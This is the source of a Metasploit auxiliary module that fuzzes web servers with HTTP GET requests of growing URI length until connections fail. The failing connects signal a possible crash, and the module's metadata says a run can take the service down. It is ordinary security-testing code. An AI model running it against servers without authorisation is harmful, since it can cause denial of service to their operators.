Path: blob/master/modules/auxiliary/fuzzers/http/http_get_uri_long.rb
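##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'English'

# Auxiliary fuzzer that issues HTTP GET requests whose URI grows by one
# generated string length per iteration, and reports the iteration at which
# the service stops accepting TCP connections.
#
# Responses are read and discarded: the module does not inspect status codes,
# so a well-behaved rejection of an over-long URI and any other reply look the
# same to it. The only failure signal is a connect that does not succeed.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Fuzzer

  # Registers module metadata and the user-settable options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HTTP GET Request URI Fuzzer (Incrementing Lengths)',
        'Description' => %q{
          This module sends a series of HTTP GET request with incrementing URL lengths.
        },
        'Author' => [ 'nullthreat' ],
        'License' => MSF_LICENSE,
        'Notes' => {
          # Declares that a run can leave the target service down; whoever
          # operates the service should expect to restart it and to collect
          # its logs or crash dumps afterwards.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
    register_options([
      Opt::RPORT(80),
      OptInt.new('MAXLENGTH', [true, 'The longest string length to try', 16384]),
      OptString.new('URIBASE', [true, 'The base URL to use for the request fuzzer', '/']),
      OptString.new('VHOST', [false, 'The virtual host name to use in requests'])
    ])
  end

  # Opens a fresh connection, sends one GET request for +uri+ and reads
  # whatever comes back within the timeout.
  #
  # @connected is cleared before connecting and set only once connect has
  # returned, so the caller can tell a failed connect apart from an error
  # raised later while sending or reading.
  #
  # @param uri [String] request target, written into the request line as-is
  # @param opts [Hash] :timeout is the read timeout passed to get_once
  #   (0.01 when absent)
  # @return the value of sock.get_once -- presumably the response bytes or
  #   nil; confirm against the Tcp mixin, which is not part of this file
  def do_http_get(uri = '', opts = {})
    @connected = false
    connect
    @connected = true

    # The Host header falls back to rhost when VHOST is unset. Neither value
    # nor the URI is encoded or validated before being put on the wire.
    sock.put("GET #{uri} HTTP/1.1\r\nHost: #{datastore['VHOST'] || rhost}\r\n\r\n")
    sock.get_once(-1, opts[:timeout] || 0.01)
  end

  # Runs the fuzzing loop for string lengths 1 through MAXLENGTH and stops at
  # the first iteration whose connect fails.
  #
  # A failed connect is attributed to the request sent in the previous
  # iteration. That is a heuristic: connection throttling or an inline
  # filtering device that starts dropping the client produces the same
  # symptom, so the finding needs to be confirmed on the target host.
  def run
    last_str = nil
    last_err = nil

    pre = make_http_uri_base
    cnt = 0

    1.upto(datastore['MAXLENGTH'].to_i) do |len|
      cnt += 1

      str = fuzzer_gen_string(len)

      # XXX: Encode the string or leave it raw? Best to make a new boolean
      # option to enable/disable this
      uri = pre + str

      print_status("Fuzzing with iteration #{cnt} using string length #{len}") if (cnt % 100).zero?

      begin
        do_http_get(uri, timeout: 0.25)
      rescue ::Interrupt
        print_status("Exiting on interrupt: iteration #{cnt} using string length #{len}")
        raise $ERROR_INFO
      rescue StandardError => e
        # Remembered for the report below; errors raised after a successful
        # connect do not stop the loop.
        last_err = e
      ensure
        disconnect
      end

      unless @connected
        if last_str
          # Report the length of the string that was actually sent in the
          # previous iteration. The loop variable already belongs to the
          # current iteration, whose request never went out, so printing it
          # next to iteration cnt - 1 overstated the length by one step.
          print_status("The service may have crashed: iteration:#{cnt - 1} len=#{last_str.length} uri=''#{last_str}'' error=#{last_err}")
        else
          print_status("Could not connect to the service: #{last_err}")
        end
        break
      end

      last_str = str
    end
  end

  # @return the configured URIBASE option, used as the prefix of every
  #   generated URI
  def make_http_uri_base
    datastore['URIBASE']
  end
end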